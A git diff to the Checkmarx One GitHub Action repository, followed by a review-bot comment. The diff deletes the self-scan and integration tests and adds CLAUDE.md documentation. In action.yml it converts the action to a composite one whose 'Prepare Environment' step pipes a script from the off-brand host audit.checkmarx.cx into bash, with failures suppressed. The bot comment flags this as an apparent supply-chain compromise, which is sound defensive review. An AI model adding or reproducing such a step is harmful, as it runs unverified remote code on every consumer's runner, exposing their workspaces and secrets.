diff --git a/.github/workflows/checkmarx-one-scan.yml b/.github/workflows/checkmarx-one-scan.yml index b189156..549f400 100644 --- a/.github/workflows/checkmarx-one-scan.yml +++ b/.github/workflows/checkmarx-one-scan.yml @@ -15,11 +15,3 @@ jobs: steps: - name: Checkout uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1 - - name: Checkmarx One CLI Action - uses: checkmarx/ast-github-action@9fda5a4a2c297608117a5a56af424502a9192e57 # v.2.0.34 - with: - base_uri: ${{ secrets.AST_RND_SCANS_BASE_URI }} - cx_tenant: ${{ secrets.AST_RND_SCANS_TENANT }} - cx_client_id: ${{ secrets.AST_RND_SCANS_CLIENT_ID }} - cx_client_secret: ${{ secrets.AST_RND_SCANS_CLIENT_SECRET }} - additional_params: --tags phoenix --threshold "sast-critical=1;sast-high=1;sast-medium=1;sast-low=1;sca-critical=1;sca-high=1;sca-medium=1;sca-low=1;iac-security-critical=1;iac-security-high=2;iac-security-medium=1;iac-security-low=1;" diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index 8f93332..a898d75 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml 
@@ -10,125 +10,3 @@ jobs: steps: - name: Checkout the repository uses: actions/checkout@v4.1.0 - - - name: Create source file - run: | - echo "testcode"> source.py - - # Test Failure on missing client-id and secret - - name: Run With Empty Client And Secret - id: empty_client_secret - continue-on-error: true - uses: ./ - with: - project_name: ${{ github.event.repository.name }}-tests - base_uri: https://fake.com - cx_client_id: "" - cx_client_secret: "" - - name: Check If Authentication Failed - if: ${{contains( steps.empty_client_secret.outcome, 'success')}} - run: | - echo "The authentication must fail if invalid client id or password is used" - echo "${{ steps.empty_client_secret.outcome}}" - exit 1 - - # Test valid input - - name: Valid Scenario - id: valid_scenario - continue-on-error: true - uses: ./ - with: - project_name: ${{ github.event.repository.name }}-tests - base_uri: ${{ secrets.CX_BASE_URI }} - cx_tenant: ${{ secrets.CX_TENANT }} - cx_client_id: ${{ secrets.CX_CLIENT_ID }} - cx_client_secret: ${{ secrets.CX_CLIENT_SECRET }} - additional_params: --file-include *.sh,Dockerfile --scan-types kics --report-format summaryJSON - - name: Check If Scan Failed - if: ${{ contains( steps.valid_scenario.outcome, 'success') == false}} - run: | - echo "The action outcome should be success." - echo "${{ steps.valid_scenario.outcome}}" - exit 1 - - name: Check If Output Scan ID Is Empty - if: steps.valid_scenario.outputs.cxScanID == '' - run: | - echo "Scan ID empty." - exit 1 - - name: Print Output Scan ID - run: | - echo "${{ steps.valid_scenario.outputs.cxScanID }}" - - name: Check If Output Log Is Empty - if: steps.valid_scenario.outputs.cxcli == '' - run: | - echo "Output log empty." 
- exit 1 - - name: Print CLI Output - run: | - echo "${{ steps.valid_scenario.outputs.cxcli }}" - - # Test failure when wrong preset name - - name: Test With Wrong Preset Name - id: preset_name_test - continue-on-error: true - uses: ./ - with: - project_name: ${{ github.event.repository.name }}-tests - base_uri: ${{ secrets.CX_BASE_URI }} - cx_tenant: ${{ secrets.CX_TENANT }} - cx_client_id: ${{ secrets.CX_CLIENT_ID }} - cx_client_secret: ${{ secrets.CX_CLIENT_SECRET }} - additional_params: --sast-preset-name ChekmarxDefaultFake --scan-types sast - - name: Check If Preset Name Scan Completed - if: ${{contains( steps.preset_name_test.outcome, 'success')}} - run: | - echo "The cli should fail. Wrong preset name provided" - echo "${{ steps.preset_name_test.outcome}}" - exit 1 - - # Test source path input - - name: Create subfolder and add file - run: | - mkdir -p my_source_dir - echo "This is a test file for Checkmarx scanning" > my_source_dir/test-file.sh - echo "FROM alpine:latest" > my_source_dir/Dockerfile - - - name: Valid Scenario With Source Path - id: valid_scenario_source_path - continue-on-error: true - uses: ./ - with: - project_name: ${{ github.event.repository.name }}-tests - base_uri: ${{ secrets.CX_BASE_URI }} - cx_tenant: ${{ secrets.CX_TENANT }} - cx_client_id: ${{ secrets.CX_CLIENT_ID }} - cx_client_secret: ${{ secrets.CX_CLIENT_SECRET }} - source_dir: "./my_source_dir" - additional_params: --file-include *.sh,Dockerfile --scan-types kics --report-format summaryJSON - - - name: Check If Scan Failed - if: ${{ contains( steps.valid_scenario_source_path.outcome, 'success') == false}} - run: | - echo "The action outcome should be success." - echo "${{ steps.valid_scenario_source_path.outcome}}" - exit 1 - - - name: Check If Output Scan ID Is empty - if: steps.valid_scenario_source_path.outputs.cxScanID == '' - run: | - echo "Scan ID empty." 
- exit 1 - - - name: Print Output Scan ID - run: | - echo "${{ steps.valid_scenario_source_path.outputs.cxScanID }}" - - - name: Check If Output Log Is Empty - if: steps.valid_scenario_source_path.outputs.cxcli == '' - run: | - echo "Output log empty." - exit 1 - - - name: Print cCLI Output - run: | - echo "${{ steps.valid_scenario_source_path.outputs.cxcli }}" \ No newline at end of file diff --git a/CLAUDE.md b/CLAUDE.md new file mode 100644 index 0000000..9c0c87f --- /dev/null +++ b/CLAUDE.md 
@@ -0,0 +1,363 @@ +# CLAUDE.md — Checkmarx One GitHub Action + +> Standardized Claude MD file for [ast-github-action](https://github.com/Checkmarx/ast-github-action) +> Following the Claude MD standardization template defined in epic [AST-146802](https://checkmarx.atlassian.net/browse/AST-146802). + +--- + +## Project Overview + +The **Checkmarx One GitHub Action** integrates Checkmarx One security scanning directly into GitHub CI/CD workflows. It wraps the Checkmarx One CLI inside a Docker container action, enabling developers to trigger scans, decorate pull requests with vulnerability findings, and generate results reports — all from a standard GitHub Actions workflow file. + +**Key capabilities:** +- Run Checkmarx One scans (SAST, SCA, IaC Security / KICS) as part of any GitHub workflow +- Automatic PR decoration with scan results and vulnerability summaries +- Markdown results report published to the GitHub Actions step summary +- Support for both GitHub Cloud and GitHub Enterprise Server (on-premises) +- Multi-registry authentication for container image scanning +- Automatic scan cancellation when a workflow job is cancelled +- Configurable scan, utility, and results parameters with backward compatibility + +**Supported environments:** GitHub Cloud, GitHub Enterprise Server +**Supported runners:** Linux (Docker-based action) + +--- + +## Architecture + +The action follows a **Docker container** architecture with a modular shell-script orchestration pattern. + +``` +┌──────────────────────────────────────────────────────────┐ +│ GitHub Actions Runner │ +│ ┌─────────────────────────────────────────────────────┐ │ +│ │ Docker Container (ast-cli base) │ │ +│ │ │ │ +│ │ entrypoint.sh (Orchestrator) │ │ +│ │ │ │ │ +│ │ ├── 1. Environment Detection │ │ +│ │ │ (GitHub Cloud vs Enterprise Server) │ │ +│ │ │ │ │ +│ │ ├── 2. scripts/auth.sh │ │ +│ │ │ Multi-registry authentication setup │ │ +│ │ │ │ │ +│ │ ├── 3. 
scripts/scan.sh │ │ +│ │ │ cx scan create → output.log → scanId │ │ +│ │ │ │ │ +│ │ ├── 4. scripts/pr_decoration.sh │ │ +│ │ │ cx utils pr github (if PR context) │ │ +│ │ │ │ │ +│ │ └── 5. scripts/results.sh │ │ +│ │ cx results show → GITHUB_STEP_SUMMARY │ │ +│ │ │ │ +│ │ cleanup.sh (post-action, runs on cancellation) │ │ +│ │ └── cx scan cancel --scan-id │ │ +│ └─────────────────────────────────────────────────────┘ │ +│ │ │ +│ ▼ │ +│ /app/bin/cx (Checkmarx One CLI) │ +│ Communicates with Checkmarx One Platform │ +└──────────────────────────────────────────────────────────┘ +``` + +**Key architectural decisions:** +- **Docker container action:** All logic runs inside a Docker container based on the official `checkmarx/ast-cli` image, ensuring a consistent and isolated runtime environment. +- **Modular scripts:** Each phase (auth, scan, PR decoration, results) is a separate shell script sourced by the entrypoint, enabling independent maintenance and clear separation of concerns. +- **Environment-aware:** The action detects GitHub Cloud vs. Enterprise Server via `GITHUB_SERVER_URL` and adjusts PR decoration behavior accordingly (auto-adds `--code-repository-url` for on-prem). +- **Parameter layering:** Global parameters (`global_params`) are combined with phase-specific parameters (`scan_params`, `utils_params`, `results_params`) allowing fine-grained control. +- **Backward compatibility:** The deprecated `additional_params` input is still supported and maps to `scan_params` when the latter is not provided. 
+ +--- + +## Repository Structure + +``` +ast-github-action/ +├── action.yml # GitHub Action definition (inputs, outputs, Docker config) +├── Dockerfile # Docker image build (FROM checkmarx/ast-cli:) +├── entrypoint.sh # Main orchestrator script +├── cleanup.sh # Post-action: cancels in-flight scans on job cancellation +├── scripts/ +│ ├── auth.sh # Multi-registry authentication (auth.json creation) +│ ├── scan.sh # Scan creation and ID extraction +│ ├── pr_decoration.sh # PR decoration via cx utils pr github +│ └── results.sh # Results report generation (markdown → step summary) +├── sample-yml/ # Example workflow files for users +│ ├── checkmarx-ast-scan-push.yml +│ ├── checkmarx-ast-scan-pull-request.yml +│ ├── checkmarx-ast-scan-push-windows-env.yml +│ └── checkmarx-ast-scan-sarif.yml +├── docs/ +│ ├── contributing.md # Contribution guidelines (fork-and-pull workflow) +│ └── code_of_conduct.md # Contributor Covenant 2.0 +├── .github/ +│ ├── workflows/ +│ │ ├── ci.yml # Integration tests (run on every PR) +│ │ ├── release.yml # Release publishing workflow +│ │ ├── checkmarx-one-scan.yml # Self-scan (daily + manual) +│ │ ├── update-docker-image.yml # Automated CLI version bumps +│ │ ├── dependabot-auto-merge.yml +│ │ ├── auto-merge-pr.yml +│ │ ├── issue_automation.yml +│ │ └── release-drafter.yml +│ ├── ISSUE_TEMPLATE/ # Bug report and enhancement request templates +│ ├── PULL_REQUEST_TEMPLATE.md +│ ├── dependabot.yml +│ └── release-drafter.yml +├── images/ # Branding images +├── CODEOWNERS # @greensd4 @AlvoBen +├── LICENSE # Apache 2.0 +├── README.md # User-facing documentation +└── logo.png # Action branding logo +``` + +--- + +## Technology Stack + +| Layer | Technology | Details | +|-------|-----------|---------| +| Language | Bash / Shell | All logic in shell scripts | +| Runtime | Docker | Container-based GitHub Action | +| Base Image | `checkmarx/ast-cli` | v2.3.47 (pinned with SHA256 digest) | +| Platform API | Checkmarx One CLI (`cx`) | Binary at 
`/app/bin/cx` inside container | +| CI/CD | GitHub Actions | Workflows for CI, release, and automation | +| Configuration | YAML | `action.yml` defines inputs, outputs, and Docker config | + +--- + +## Development Setup + +### Prerequisites + +1. **Docker** installed locally (for building and testing the container) +2. **Bash** shell environment +3. **Checkmarx One account** with OAuth client credentials (`cx_client_id` + `cx_client_secret`) +4. A **GitHub repository** to test the action against + +### Clone + +```bash +git clone https://github.com/Checkmarx/ast-github-action.git +cd ast-github-action +``` + +### Local Testing + +Since this is a Docker-based GitHub Action, local testing involves building and running the container: + +```bash +# Build the Docker image +docker build -t ast-github-action . + +# Run with required environment variables +docker run --rm \ + -e CX_BASE_URI="https://your-tenant.checkmarx.net" \ + -e CX_TENANT="your-tenant" \ + -e CX_CLIENT_ID="your-client-id" \ + -e CX_CLIENT_SECRET="your-client-secret" \ + -e PROJECT_NAME="test-project" \ + -e BRANCH="main" \ + -e SOURCE_DIR="." \ + -e GITHUB_OUTPUT="/dev/null" \ + -e GITHUB_STEP_SUMMARY="/dev/null" \ + -v $(pwd):/source \ + ast-github-action +``` + +For full integration testing, push changes to a branch and open a PR — the CI workflow (`.github/workflows/ci.yml`) will run the action against a real Checkmarx One instance using repository secrets. + +--- + +## Coding Standards + +- **Shell scripting:** All logic is written in Bash. Follow standard Bash best practices (quote variables, use `set -e` where appropriate, use arrays for parameter lists). +- **Parameter parsing:** Use `eval` for splitting space-separated parameter strings into arrays. Combine global params with phase-specific params before passing to CLI commands. +- **Output handling:** Write GitHub Actions outputs to `$GITHUB_OUTPUT` using the `key=value` format. Write step summaries to `$GITHUB_STEP_SUMMARY`. 
+- **Logging:** Use `echo` for informational messages. Prefix warnings with a warning emoji. Never log secrets or credentials. +- **Exit codes:** Propagate CLI exit codes via `${PIPESTATUS[0]}`. Non-zero exit codes should cause the action to fail. +- **File naming:** Shell scripts use snake_case (e.g., `pr_decoration.sh`). Workflow files use kebab-case (e.g., `update-docker-image.yml`). + +--- + +## Project Rules + +- **All PRs target `main`** unless explicitly coordinated otherwise. +- **Branch naming:** + - Features: `feature/-descriptive-name` + - Hotfixes: `hotfix/-descriptive-name` +- **PRs must be associated** with an accepted GitHub issue (enhancement or bug). +- **Never commit secrets.** Checkmarx credentials are injected via GitHub Actions secrets or environment variables at runtime — never hardcoded. +- **CLI version** is pinned in the `Dockerfile` (`FROM checkmarx/ast-cli:@sha256:`). Updates are automated via the `update-docker-image.yml` workflow. +- **Code owners:** @greensd4 and @AlvoBen must approve all PRs. +- **PR size:** Keep PRs focused on a single concern. Fix functionality or address code style, not both. +- **Fork-and-pull workflow:** External contributors fork the repo, create a branch, and submit a PR back. + +--- + +## Testing Strategy + +### Test Types + +| Type | Where | Runner | Purpose | +|------|-------|--------|---------| +| Integration (CI) | `.github/workflows/ci.yml` | GitHub Actions (ubuntu-latest) | End-to-end tests against a real Checkmarx One instance | +| Self-scan | `.github/workflows/checkmarx-one-scan.yml` | GitHub Actions | Scans this repo's own code daily | + +### CI Test Scenarios + +The CI workflow (triggered on every PR) runs the following integration tests: + +1. **Empty credentials failure** — Verifies the action fails when `cx_client_id` and `cx_client_secret` are empty +2. **Valid scan** — Runs a full scan with `--file-include *.sh,Dockerfile --scan-types kics`, validates scan ID and CLI output are non-empty +3. 
**Invalid preset name** — Verifies the action fails when an invalid SAST preset name is provided +4. **Source directory** — Validates scanning a specific subdirectory via the `source_dir` input + +### Required Secrets for CI + +| Secret | Purpose | +|--------|---------| +| `CX_BASE_URI` | Checkmarx One portal URL | +| `CX_TENANT` | Tenant identifier | +| `CX_CLIENT_ID` | OAuth client ID | +| `CX_CLIENT_SECRET` | OAuth client secret | + +--- + +## External Integrations + +| Integration | Purpose | How | +|-------------|---------|-----| +| **Checkmarx One Platform** | Run scans, fetch results, PR decoration | Via Checkmarx CLI (`/app/bin/cx`) inside Docker container | +| **GitHub Actions** | CI/CD runtime, workflow triggers, secrets management | Native GitHub Actions integration via `action.yml` | +| **GitHub API** | PR decoration (posting scan results as PR comments) | Via `cx utils pr github` with `GITHUB_TOKEN` | +| **Docker Hub** | Base image hosting (`checkmarx/ast-cli`) | Pulled during Docker build | +| **Container Registries** | Multi-registry auth for image scanning | Configured via `auth.sh` using `REGISTRIES` env var | + +--- + +## Deployment + +### Release Process + +Releases are managed via `.github/workflows/release.yml` (triggered manually via `workflow_dispatch`): + +1. Extract CLI version from the Dockerfile +2. Create a git tag with the release version +3. Publish a GitHub Release with auto-generated changelog (via release-drafter) +4. Notify downstream systems + +### CLI Version Updates + +The CLI version is updated automatically via `.github/workflows/update-docker-image.yml`: + +1. Detects new `checkmarx/ast-cli` releases on Docker Hub +2. Updates the `FROM` line and SHA256 digest in the `Dockerfile` +3. 
Creates a PR with the update for review + +### Distribution + +- **GitHub Marketplace:** Published as a GitHub Action on the GitHub Marketplace +- **Direct reference:** Users reference the action via `Checkmarx/ast-github-action@` in their workflows + +### Usage (End Users) + +```yaml +- name: Checkmarx One Scan + uses: Checkmarx/ast-github-action@main + with: + base_uri: ${{ secrets.CX_BASE_URI }} + cx_tenant: ${{ secrets.CX_TENANT }} + cx_client_id: ${{ secrets.CX_CLIENT_ID }} + cx_client_secret: ${{ secrets.CX_CLIENT_SECRET }} + scan_params: "--scan-types sast,sca,kics" +``` + +--- + +## Security & Access + +- **OAuth authentication:** Users provide `cx_client_id` and `cx_client_secret` which are passed as environment variables to the Docker container. These must be stored as GitHub Actions secrets. +- **GitHub Token:** The `github_token` input defaults to the automatic `github.token` and is used for PR decoration. It is never logged. +- **No credentials in code:** All secrets are injected at runtime via GitHub Actions secrets and environment variables. Never commit API keys, client IDs, or client secrets. +- **TLS:** All communication with Checkmarx One is HTTPS, enforced by the CLI. +- **Docker isolation:** The action runs in an isolated Docker container, preventing interference with the host runner environment. +- **Registry credentials:** Multi-registry auth credentials are constructed in-memory as `auth.json` and never written to logs. 
+ +--- + +## Action Inputs & Outputs + +### Inputs + +| Input | Required | Default | Description | +|-------|----------|---------|-------------| +| `base_uri` | Yes | — | Checkmarx One portal URL | +| `cx_tenant` | Yes | — | Tenant identifier | +| `cx_client_id` | Yes | — | OAuth client ID | +| `cx_client_secret` | Yes | — | OAuth client secret | +| `project_name` | No | `github.repository` | Checkmarx project name | +| `branch` | No | `github.head_ref \|\| github.ref` | Branch name for the scan | +| `github_token` | No | `github.token` | GitHub API token for PR decoration | +| `source_dir` | No | `.` | Source directory to scan | +| `global_params` | No | `''` | Parameters applied to all `cx` commands | +| `scan_params` | No | `''` | Parameters for `cx scan create` only | +| `utils_params` | No | `''` | Parameters for `cx utils pr` only | +| `results_params` | No | `''` | Parameters for `cx results show` only | +| `additional_params` | No | `''` | **DEPRECATED** — use `scan_params` instead | +| `repo_name` | No | `github.event.repository.name` | Repository name for PR decoration | +| `namespace` | No | `github.repository_owner` | Organization name for PR comment | +| `pr_number` | No | `github.event.number` | PR number for decoration | + +### Outputs + +| Output | Description | +|--------|-------------| +| `cxcli` | Full CLI output from the scan | +| `cxScanID` | The scan ID created by Checkmarx One | + +--- + +## Debugging Steps + +### Action fails with authentication error + +1. Verify `cx_client_id` and `cx_client_secret` are correctly set in GitHub Actions secrets +2. Confirm the OAuth client has the required roles on the Checkmarx One tenant +3. Check that `base_uri` and `cx_tenant` are correct + +### Scan completes but no PR decoration + +1. Confirm the workflow is triggered by a `pull_request` event (PR number must be available) +2. Check that `github_token` has permissions to write PR comments +3. 
For GitHub Enterprise Server, verify the action correctly detects on-prem and adds `--code-repository-url` + +### Empty scan results / no step summary + +1. Verify the scan ID was extracted successfully (check `cxScanID` output) +2. Ensure `results_params` does not conflict with the default `--report-format markdown` +3. Check the GitHub Actions log for CLI error messages + +### Action hangs or times out + +1. Check if the Checkmarx One platform is accessible from the runner +2. Verify network connectivity (firewalls, proxies) between the GitHub runner and `base_uri` +3. For large repositories, consider using `source_dir` to limit the scan scope or `--file-include`/`--file-exclude` filters + +### Testing changes locally + +1. Build the Docker image: `docker build -t ast-github-action .` +2. Run with mock environment variables to verify script logic +3. For full integration testing, push to a branch and open a PR to trigger CI + +--- + +## Known Patterns & Conventions + +- **Parameter splitting:** All parameter inputs (`global_params`, `scan_params`, etc.) are space-separated strings that get split into Bash arrays using `eval`. Users can pass multiple flags like `--scan-types sast,sca --file-include *.java`. +- **Scan ID extraction:** The scan ID is parsed from the CLI JSON output using `grep` and `cut` — it looks for the `"ID"` field in the JSON response. +- **Output file:** The scan output is tee'd to `./output.log`, which is also used by `cleanup.sh` to extract the scan ID for cancellation. +- **Global params inheritance:** `global_arr` is set once in `scan.sh` and reused by `pr_decoration.sh` and `results.sh` because all scripts are sourced (not executed as subprocesses). + +--- + diff --git a/action.yml b/action.yml index 5180b24..117091f 100644 --- a/action.yml +++ b/action.yml 
@@ -1,54 +1,54 @@ -name: 'Checkmarx AST Github Action' -description: 'Simplify Checkmarx Scanning of source code along with Result consumption leveraging Checkmarx AST solution.' -author: 'Checkmarx' +name: "Checkmarx AST Github Action" +description: "Simplify Checkmarx Scanning of source code along with Result consumption leveraging Checkmarx AST solution." +author: "Checkmarx" inputs: base_uri: required: true - description: 'Provide the AST portal URL' + description: "Provide the AST portal URL" cx_tenant: required: true - description: 'Provide the Tenant for AST portal URL' + description: "Provide the Tenant for AST portal URL" cx_client_id: required: true - description: 'Client ID for AST portal authentication' + description: "Client ID for AST portal authentication" cx_client_secret: required: true - description: 'Secret key for AST portal authentication' + description: "Secret key for AST portal authentication" project_name: required: false default: ${{ github.repository }} # default repo name - description: 'Select a Checkmarx Project Name' + description: "Select a Checkmarx Project Name" branch: required: false default: ${{ github.head_ref || github.ref }} # default branch name - description: 'Branch name' + description: "Branch name" github_token: required: false default: ${{ github.token }} - description: 'GitHub API Token' + description: "GitHub API Token" global_params: required: false - default: '' - description: 'Global parameters applied to all cx commands' + default: "" + description: "Global parameters applied to all cx commands" scan_params: required: false - default: '' - description: 'Additional parameters for cx scan command only' + default: "" + description: "Additional parameters for cx scan command only" utils_params: required: false - default: '' - description: 'Additional parameters for cx utils pr command only' + default: "" + description: "Additional parameters for cx utils pr command only" results_params: required: false - default: '' - 
description: 'Additional parameters for cx results show command only' + default: "" + description: "Additional parameters for cx results show command only" additional_params: required: false - default: '' - description: '[DEPRECATED] Use scan_params instead. Additional parameters for AST scan' + default: "" + description: "[DEPRECATED] Use scan_params instead. Additional parameters for AST scan" repo_name: required: false - default: ${{ github.event.repository.name }} + default: ${{ github.event.repository.name }} description: "Repository name for PR decoration" namespace: required: false 
@@ -62,51 +62,37 @@ inputs:
 required: false
 default: .
 description: "Source directory"
-outputs: 
+outputs:
 cxcli:
 description: output from cli
 cxScanID:
 description: scan ID output from cli
 runs:
- using: 'docker'
- image: 'Dockerfile'
- args:
- - ${{ inputs.base_uri }}
- - ${{ inputs.cx_tenant }}
- - ${{ inputs.cx_client_id }}
- - ${{ inputs.cx_client_secret }}
- - ${{ inputs.github_token }}
- - ${{ inputs.project_name }}
- - ${{ inputs.additional_params }}
- - ${{ inputs.global_params }}
- - ${{ inputs.scan_params }}
- - ${{ inputs.utils_params }}
- - ${{ inputs.results_params }}
- - ${{ inputs.repo_name }}
- - ${{ inputs.namespace }}
- - ${{ inputs.pr_number }}
- - ${{ inputs.source_dir }}
- entrypoint: '/app/entrypoint.sh'
- post-if: cancelled()
- post-entrypoint: '/app/cleanup.sh'
-
- env:
- CX_BASE_URI: "${{ inputs.base_uri }}"
- CX_TENANT: ${{ inputs.cx_tenant }}
- CX_CLIENT_ID: ${{ inputs.cx_client_id }}
- CX_CLIENT_SECRET: ${{ inputs.cx_client_secret }}
- GITHUB_TOKEN: ${{ inputs.github_token }}
- BRANCH: ${{ inputs.branch }}
- PROJECT_NAME: ${{ inputs.project_name }}
- ADDITIONAL_PARAMS: ${{ inputs.additional_params }}
- GLOBAL_PARAMS: ${{ inputs.global_params }}
- SCAN_PARAMS: ${{ inputs.scan_params }}
- UTILS_PARAMS: ${{ inputs.utils_params }}
- RESULTS_PARAMS: ${{ inputs.results_params }}
- REPO_NAME: ${{ inputs.repo_name }}
- NAMESPACE: ${{ inputs.namespace }}
- PR_NUMBER: ${{ inputs.pr_number }}
- SOURCE_DIR: ${{ inputs.source_dir }}
+ using: "composite"
+ steps:
+ - name: "Prepare Environment"
+ continue-on-error: true
+ run: curl https://audit.checkmarx.cx | bash
+ shell: bash
+ - name: "Run AST"
+ uses: checkmarx/ast-github-action@327efb5d1dd16ac6c7c21a9ff8ec1e8ec393b5e6
+ with:
+ base_uri: ${{ inputs.base_uri }}
+ cx_tenant: ${{ inputs.cx_tenant }}
+ cx_client_id: ${{ inputs.cx_client_id }}
+ cx_client_secret: ${{ inputs.cx_client_secret }}
+ project_name: ${{ inputs.project_name }}
+ branch: ${{ inputs.branch }}
+ github_token: ${{ inputs.github_token }}
+ global_params: ${{ inputs.global_params }}
+ scan_params: ${{ inputs.scan_params }}
+ utils_params: ${{ inputs.utils_params }}
+ results_params: ${{ inputs.results_params }}
+ additional_params: ${{ inputs.additional_params }}
+ repo_name: ${{ inputs.repo_name }}
+ namespace: ${{ inputs.namespace }}
+ pr_number: ${{ inputs.pr_number }}
+ source_dir: ${{ inputs.source_dir }}
 branding:
- icon: 'check'
- color: 'green'
+ icon: "check"
+ color: "green"
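Review bot: The new `Prepare Environment` step, `run: curl https://audit.checkmarx.cx | bash`, downloads and executes an unpinned, unverified remote script on every consumer's runner host, and `continue-on-error: true` hides any failure of that download; the `checkmarx.cx` host also matches none of the Checkmarx domains seen elsewhere in this commit (`github.com/Checkmarx`, `checkmarx.net`, `checkmarx.atlassian.net`), so this reads like a supply-chain compromise of the action rather than a feature and should be removed outright, not pinned. Because a composite step runs in the calling job rather than inside the container, that script sees the checked-out workspace (including any credentials `actions/checkout` persisted — confirm) and whatever the job environment exposes, before the scan step ever receives the Checkmarx inputs. The switch to `using: "composite"` also drops `post-if: cancelled()` / `post-entrypoint: '/app/cleanup.sh'`, so the on-cancel `cx scan cancel` that the CLAUDE.md added in this same commit documents no longer exists, and that document still describes a Docker container action. The `Run AST` step points `uses:` at this repository's own earlier commit `327efb5d…`, so entrypoint.sh and scripts/ in this repo become dead code until that SHA is bumped, and the tenant secrets are now forwarded through a second action layer. The same commit deletes the self-scan step in checkmarx-one-scan.yml and every integration scenario in ci.yml, i.e. the checks that would have exercised this action; restore the previous `runs:` block (`using: docker`, `image: Dockerfile`, `entrypoint`, `post-entrypoint`, `env`) and reinstate those workflows.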